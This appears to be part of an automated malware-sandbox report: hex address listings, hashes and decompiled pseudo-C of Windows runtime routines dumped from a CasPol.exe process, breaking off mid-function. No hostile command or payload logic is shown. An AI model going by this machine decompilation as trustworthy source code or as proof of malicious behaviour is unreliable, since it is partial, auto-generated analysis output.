                                                                                                                                                                                                                                                                                                0x01788213
                                                                                                                                                                                                                                                                                                0x01788218
                                                                                                                                                                                                                                                                                                0x01734085
                                                                                                                                                                                                                                                                                                0x01734088
                                                                                                                                                                                                                                                                                                0x0173408e
                                                                                                                                                                                                                                                                                                0x01734094
                                                                                                                                                                                                                                                                                                0x0173409a
                                                                                                                                                                                                                                                                                                0x017340a0
                                                                                                                                                                                                                                                                                                0x017340a6
                                                                                                                                                                                                                                                                                                0x017340a9
                                                                                                                                                                                                                                                                                                0x017340af
                                                                                                                                                                                                                                                                                                0x017340b6
                                                                                                                                                                                                                                                                                                0x017340bd
                                                                                                                                                                                                                                                                                                0x017340bd
                                                                                                                                                                                                                                                                                                0x01733d83
                                                                                                                                                                                                                                                                                                0x0178821f
                                                                                                                                                                                                                                                                                                0x01788229
                                                                                                                                                                                                                                                                                                0x01788238
                                                                                                                                                                                                                                                                                                0x01788238
                                                                                                                                                                                                                                                                                                0x0178823d
                                                                                                                                                                                                                                                                                                0x0178823d
                                                                                                                                                                                                                                                                                                0x01733da0
                                                                                                                                                                                                                                                                                                0x01733daf
                                                                                                                                                                                                                                                                                                0x01733db5
                                                                                                                                                                                                                                                                                                0x01733dba
                                                                                                                                                                                                                                                                                                0x01733dba
                                                                                                                                                                                                                                                                                                0x01733dd4
                                                                                                                                                                                                                                                                                                0x01733e94
                                                                                                                                                                                                                                                                                                0x01733eab
                                                                                                                                                                                                                                                                                                0x01733f6d
                                                                                                                                                                                                                                                                                                0x01733f84
                                                                                                                                                                                                                                                                                                0x0173406b
                                                                                                                                                                                                                                                                                                0x0173406b
                                                                                                                                                                                                                                                                                                0x0173406e
                                                                                                                                                                                                                                                                                                0x0173406e
                                                                                                                                                                                                                                                                                                0x01734070
                                                                                                                                                                                                                                                                                                0x01734074
                                                                                                                                                                                                                                                                                                0x01788351
                                                                                                                                                                                                                                                                                                0x01788351
                                                                                                                                                                                                                                                                                                0x0173407a
                                                                                                                                                                                                                                                                                                0x0173407f
                                                                                                                                                                                                                                                                                                0x0178835d
                                                                                                                                                                                                                                                                                                0x01788370
                                                                                                                                                                                                                                                                                                0x01788377
                                                                                                                                                                                                                                                                                                0x01788379
                                                                                                                                                                                                                                                                                                0x0178837c
                                                                                                                                                                                                                                                                                                0x0178837c
                                                                                                                                                                                                                                                                                                0x0178835d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0173407f
                                                                                                                                                                                                                                                                                                0x01733f8a
                                                                                                                                                                                                                                                                                                0x01733f8d
                                                                                                                                                                                                                                                                                                0x01733f90
                                                                                                                                                                                                                                                                                                0x01733f95
                                                                                                                                                                                                                                                                                                0x0178830d
                                                                                                                                                                                                                                                                                                0x0178830f
                                                                                                                                                                                                                                                                                                0x01733f9b
                                                                                                                                                                                                                                                                                                0x01733fac
                                                                                                                                                                                                                                                                                                0x01733fae
                                                                                                                                                                                                                                                                                                0x01733fb1
                                                                                                                                                                                                                                                                                                0x01733fb1
                                                                                                                                                                                                                                                                                                0x01733fb6
                                                                                                                                                                                                                                                                                                0x01788317
                                                                                                                                                                                                                                                                                                0x0178831a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733fbc
                                                                                                                                                                                                                                                                                                0x01733fc1
                                                                                                                                                                                                                                                                                                0x01733fc9
                                                                                                                                                                                                                                                                                                0x01733fd7
                                                                                                                                                                                                                                                                                                0x01733fda
                                                                                                                                                                                                                                                                                                0x01733fdd
                                                                                                                                                                                                                                                                                                0x01734021
                                                                                                                                                                                                                                                                                                0x01734021
                                                                                                                                                                                                                                                                                                0x01734029
                                                                                                                                                                                                                                                                                                0x01734030
                                                                                                                                                                                                                                                                                                0x01734044
                                                                                                                                                                                                                                                                                                0x01734046
                                                                                                                                                                                                                                                                                                0x01734046
                                                                                                                                                                                                                                                                                                0x01734044
                                                                                                                                                                                                                                                                                                0x01734049
                                                                                                                                                                                                                                                                                                0x01788327
                                                                                                                                                                                                                                                                                                0x01788334
                                                                                                                                                                                                                                                                                                0x01788339
                                                                                                                                                                                                                                                                                                0x0178833c
                                                                                                                                                                                                                                                                                                0x0173404f
                                                                                                                                                                                                                                                                                                0x0173404f
                                                                                                                                                                                                                                                                                                0x0173404f
                                                                                                                                                                                                                                                                                                0x01734051
                                                                                                                                                                                                                                                                                                0x01734056
                                                                                                                                                                                                                                                                                                0x01734063
                                                                                                                                                                                                                                                                                                0x01734063
                                                                                                                                                                                                                                                                                                0x017882a3
                                                                                                                                                                                                                                                                                                0x017882a3
                                                                                                                                                                                                                                                                                                0x01733e58
                                                                                                                                                                                                                                                                                                0x01733e60
                                                                                                                                                                                                                                                                                                0x01733e6f
                                                                                                                                                                                                                                                                                                0x01733e74
                                                                                                                                                                                                                                                                                                0x01733e77
                                                                                                                                                                                                                                                                                                0x01733e77
                                                                                                                                                                                                                                                                                                0x01733e7a
                                                                                                                                                                                                                                                                                                0x01733e7f
                                                                                                                                                                                                                                                                                                0x01733e8c
                                                                                                                                                                                                                                                                                                0x01733e8c
                                                                                                                                                                                                                                                                                                0x01733e91
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733e91

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • WindowsExcludedProcs, xrefs: 01733D6F
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 01733DC0
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01733E97
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01733D8C
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 01733F70
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                                                • API String ID: 0-258546922
                                                                                                                                                                                                                                                                                                • Opcode ID: d1450d086018bb218e16f3788cdc5fdb11dba08f2051b2bbe5d1b414fb8a21da
                                                                                                                                                                                                                                                                                                • Instruction ID: ba981adc37b42c237cdd7e03a195dd795df4d6d5a354833affd30c5abe50d6cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1450d086018bb218e16f3788cdc5fdb11dba08f2051b2bbe5d1b414fb8a21da
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF15E72D40219EFCB26DF98C984AEEFBB9FF58650F54006AE905E7255D7349E00CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                                			E0172B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                                                                				signed short _t69;
                                                                                                                                                                                                                                                                                                				intOrPtr _t70;
                                                                                                                                                                                                                                                                                                				signed short _t85;
                                                                                                                                                                                                                                                                                                				void* _t86;
                                                                                                                                                                                                                                                                                                				signed short _t89;
                                                                                                                                                                                                                                                                                                				signed short _t91;
                                                                                                                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t98;
                                                                                                                                                                                                                                                                                                				signed short _t99;
                                                                                                                                                                                                                                                                                                				signed short _t101;
                                                                                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                                                                                				char* _t103;
                                                                                                                                                                                                                                                                                                				signed short _t104;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t110;
                                                                                                                                                                                                                                                                                                				void* _t111;
                                                                                                                                                                                                                                                                                                				void* _t114;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t115;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t109 = __esi;
                                                                                                                                                                                                                                                                                                				_t108 = __edi;
                                                                                                                                                                                                                                                                                                				_t106 = __edx;
                                                                                                                                                                                                                                                                                                				_t95 = __ebx;
                                                                                                                                                                                                                                                                                                				_push(0x90);
                                                                                                                                                                                                                                                                                                				_push(0x17ff7a8);
                                                                                                                                                                                                                                                                                                				E0177D0E8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                				if(__edx == 0xffffffff) {
                                                                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                                                                                                                                                                                                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                					__eflags = _t65 & 0x00000002;
                                                                                                                                                                                                                                                                                                					if((_t65 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                                                                                						return E0177D130(_t95, _t108, _t109);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                                                                                                                                                                                                                                					_t108 = 0;
                                                                                                                                                                                                                                                                                                					_t109 = 0;
                                                                                                                                                                                                                                                                                                					_t95 = 0;
                                                                                                                                                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                                                                						__eflags = _t95 - 0x200;
                                                                                                                                                                                                                                                                                                						if(_t95 >= 0x200) {
                                                                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						E0176D000(0x80);
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                                                                                                                                                                                                                                						_t108 = _t115;
                                                                                                                                                                                                                                                                                                						_t95 = _t95 - 0xffffff80;
                                                                                                                                                                                                                                                                                                						_t17 = _t114 - 4;
                                                                                                                                                                                                                                                                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                						__eflags =  *_t17;
                                                                                                                                                                                                                                                                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                                                                                                                                                                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                                                                                                                                                                                                						_t102 = _t110 + 1;
                                                                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                                                                							_t85 =  *_t110;
                                                                                                                                                                                                                                                                                                							_t110 = _t110 + 1;
                                                                                                                                                                                                                                                                                                							__eflags = _t85;
                                                                                                                                                                                                                                                                                                						} while (_t85 != 0);
                                                                                                                                                                                                                                                                                                						_t111 = _t110 - _t102;
                                                                                                                                                                                                                                                                                                						_t21 = _t95 - 1; // -129
                                                                                                                                                                                                                                                                                                						_t86 = _t21;
                                                                                                                                                                                                                                                                                                						__eflags = _t111 - _t86;
                                                                                                                                                                                                                                                                                                						if(_t111 > _t86) {
                                                                                                                                                                                                                                                                                                							_t111 = _t86;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						E0176F3E0(_t108, _t106, _t111);
                                                                                                                                                                                                                                                                                                						_t115 = _t115 + 0xc;
                                                                                                                                                                                                                                                                                                						_t103 = _t111 + _t108;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                                                                                                                                                                                                                                						_t89 = _t95 - _t111;
                                                                                                                                                                                                                                                                                                						__eflags = _t89;
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						if(_t89 == 0) {
                                                                                                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                                                                                                							_t109 = 0xc000000d;
                                                                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							__eflags = _t89 - 0x7fffffff;
                                                                                                                                                                                                                                                                                                							if(_t89 <= 0x7fffffff) {
                                                                                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                                                                                								 *(_t114 - 0x94) = _t109;
                                                                                                                                                                                                                                                                                                								__eflags = _t109;
                                                                                                                                                                                                                                                                                                								if(_t109 < 0) {
                                                                                                                                                                                                                                                                                                									__eflags = _t89;
                                                                                                                                                                                                                                                                                                									if(_t89 != 0) {
                                                                                                                                                                                                                                                                                                										 *_t103 = 0;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									L26:
                                                                                                                                                                                                                                                                                                									 *(_t114 - 0xa0) = _t109;
                                                                                                                                                                                                                                                                                                									 *(_t114 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                									__eflags = _t109;
                                                                                                                                                                                                                                                                                                									if(_t109 >= 0) {
                                                                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                                                                										_t98 = _t108;
                                                                                                                                                                                                                                                                                                										_t39 = _t98 + 1; // 0x1
                                                                                                                                                                                                                                                                                                										_t106 = _t39;
                                                                                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                                                                                											_t69 =  *_t98;
                                                                                                                                                                                                                                                                                                											_t98 = _t98 + 1;
                                                                                                                                                                                                                                                                                                											__eflags = _t69;
                                                                                                                                                                                                                                                                                                										} while (_t69 != 0);
                                                                                                                                                                                                                                                                                                										_t99 = _t98 - _t106;
                                                                                                                                                                                                                                                                                                										__eflags = _t99;
                                                                                                                                                                                                                                                                                                										L34:
                                                                                                                                                                                                                                                                                                										_t70 =  *[fs:0x30];
                                                                                                                                                                                                                                                                                                										__eflags =  *((char*)(_t70 + 2));
                                                                                                                                                                                                                                                                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                                                                                                                                                                                                                                                                											L40:
                                                                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                                                                                                                                                                                                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                                                                                                                                                                                                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                                                                                                                                                                                                                                											 *(_t114 - 4) = 1;
                                                                                                                                                                                                                                                                                                											_push(_t114 - 0x74);
                                                                                                                                                                                                                                                                                                											L0177DEF0(_t99, _t106);
                                                                                                                                                                                                                                                                                                											 *(_t114 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                                                                                                                                                                                                											goto L3;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                                                                                                                                                                                                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                                                                                                                                                                                                                                											goto L40;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                                                                                                                                                                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                                                                                                                                                                                                                                										_push(_t99 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                										_push(_t108);
                                                                                                                                                                                                                                                                                                										_push(1);
                                                                                                                                                                                                                                                                                                										_t101 = E0176B280();
                                                                                                                                                                                                                                                                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                                                                                                                                                                                                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                                                                                                                                                                                                                                											__eflags = _t101 - 0x80000003;
                                                                                                                                                                                                                                                                                                											if(_t101 == 0x80000003) {
                                                                                                                                                                                                                                                                                                												L0176B7E0(1);
                                                                                                                                                                                                                                                                                                												_t101 = 0;
                                                                                                                                                                                                                                                                                                												__eflags = 0;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                                                                                                                                                                                                										goto L4;
                                                                                                                                                                                                                                                                                                									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0176E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0176A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                                                                                                                                                                                0x0178486e
                                                                                                                                                                                                                                                                                                0x01784871
                                                                                                                                                                                                                                                                                                0x01784876
                                                                                                                                                                                                                                                                                                0x01784876
                                                                                                                                                                                                                                                                                                0x01784878
                                                                                                                                                                                                                                                                                                0x0178487b
                                                                                                                                                                                                                                                                                                0x01784884
                                                                                                                                                                                                                                                                                                0x01784884
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178487d
                                                                                                                                                                                                                                                                                                0x0178487d
                                                                                                                                                                                                                                                                                                0x01784882
                                                                                                                                                                                                                                                                                                0x01784889
                                                                                                                                                                                                                                                                                                0x01784889
                                                                                                                                                                                                                                                                                                0x0178488f
                                                                                                                                                                                                                                                                                                0x01784891
                                                                                                                                                                                                                                                                                                0x017848e0
                                                                                                                                                                                                                                                                                                0x017848e2
                                                                                                                                                                                                                                                                                                0x017848e4
                                                                                                                                                                                                                                                                                                0x017848e4
                                                                                                                                                                                                                                                                                                0x017848e7
                                                                                                                                                                                                                                                                                                0x017848e7
                                                                                                                                                                                                                                                                                                0x017848ed
                                                                                                                                                                                                                                                                                                0x017848f4
                                                                                                                                                                                                                                                                                                0x017848f6
                                                                                                                                                                                                                                                                                                0x01784951
                                                                                                                                                                                                                                                                                                0x01784951
                                                                                                                                                                                                                                                                                                0x01784953
                                                                                                                                                                                                                                                                                                0x01784953
                                                                                                                                                                                                                                                                                                0x01784956
                                                                                                                                                                                                                                                                                                0x01784956
                                                                                                                                                                                                                                                                                                0x01784958
                                                                                                                                                                                                                                                                                                0x01784959
                                                                                                                                                                                                                                                                                                0x01784959
                                                                                                                                                                                                                                                                                                0x0178495d
                                                                                                                                                                                                                                                                                                0x0178495d
                                                                                                                                                                                                                                                                                                0x0178495f
                                                                                                                                                                                                                                                                                                0x0178495f
                                                                                                                                                                                                                                                                                                0x01784965
                                                                                                                                                                                                                                                                                                0x01784969
                                                                                                                                                                                                                                                                                                0x017849ba
                                                                                                                                                                                                                                                                                                0x017849ba
                                                                                                                                                                                                                                                                                                0x017849c1
                                                                                                                                                                                                                                                                                                0x017849c5
                                                                                                                                                                                                                                                                                                0x017849cc
                                                                                                                                                                                                                                                                                                0x017849d4
                                                                                                                                                                                                                                                                                                0x017849d7
                                                                                                                                                                                                                                                                                                0x017849da
                                                                                                                                                                                                                                                                                                0x017849e4
                                                                                                                                                                                                                                                                                                0x017849e5
                                                                                                                                                                                                                                                                                                0x017849f3
                                                                                                                                                                                                                                                                                                0x01784a02
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784a02
                                                                                                                                                                                                                                                                                                0x01784972
                                                                                                                                                                                                                                                                                                0x01784974
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784976
                                                                                                                                                                                                                                                                                                0x01784979
                                                                                                                                                                                                                                                                                                0x01784982
                                                                                                                                                                                                                                                                                                0x01784983
                                                                                                                                                                                                                                                                                                0x01784984
                                                                                                                                                                                                                                                                                                0x0178498b
                                                                                                                                                                                                                                                                                                0x0178498d
                                                                                                                                                                                                                                                                                                0x01784991
                                                                                                                                                                                                                                                                                                0x01784993
                                                                                                                                                                                                                                                                                                0x01784999
                                                                                                                                                                                                                                                                                                0x0178499d
                                                                                                                                                                                                                                                                                                0x017849a2
                                                                                                                                                                                                                                                                                                0x017849a2
                                                                                                                                                                                                                                                                                                0x017849a2
                                                                                                                                                                                                                                                                                                0x01784999
                                                                                                                                                                                                                                                                                                0x017849ac
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017849b3
                                                                                                                                                                                                                                                                                                0x017848f8
                                                                                                                                                                                                                                                                                                0x017848fe
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017848fe
                                                                                                                                                                                                                                                                                                0x01784895
                                                                                                                                                                                                                                                                                                0x0178489c
                                                                                                                                                                                                                                                                                                0x017848ad
                                                                                                                                                                                                                                                                                                0x017848b2
                                                                                                                                                                                                                                                                                                0x017848b5
                                                                                                                                                                                                                                                                                                0x017848b7
                                                                                                                                                                                                                                                                                                0x017848ba
                                                                                                                                                                                                                                                                                                0x017848bc
                                                                                                                                                                                                                                                                                                0x017848c6
                                                                                                                                                                                                                                                                                                0x017848c6
                                                                                                                                                                                                                                                                                                0x017848cb
                                                                                                                                                                                                                                                                                                0x017848d1

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _vswprintf_s
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 677850445-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a5388a0823d89b45c5ee1d2dd277e62af156f1b41800fd95e16d0107b933913a
                                                                                                                                                                                                                                                                                                • Instruction ID: 1811a8d8abe3e04d42206c23be9e9fa596f855c2d5f24ec1a5da67c395cd7d4f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5388a0823d89b45c5ee1d2dd277e62af156f1b41800fd95e16d0107b933913a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8851E471D5026A8FDF31EF68C844BAEFBB0BF04710F1141ADD85AAB282D7B44941CB91
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                                			E0174B944(signed int* __ecx, char __edx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                				signed int* _v48;
                                                                                                                                                                                                                                                                                                				signed int _v52;
                                                                                                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                                                                                                                                                                				char _v77;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                                                                                				char* _t73;
                                                                                                                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                                                                                                                                                				signed int _t82;
                                                                                                                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                                                                				char _t88;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t89;
                                                                                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                                                                                				void* _t97;
                                                                                                                                                                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                                                                                				void* _t107;
                                                                                                                                                                                                                                                                                                				signed int _t108;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t112;
                                                                                                                                                                                                                                                                                                				void* _t113;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t114;
                                                                                                                                                                                                                                                                                                				intOrPtr _t115;
                                                                                                                                                                                                                                                                                                				intOrPtr _t116;
                                                                                                                                                                                                                                                                                                				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x181d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01747D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L017F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L01769E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L0176B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L0176CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01747D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
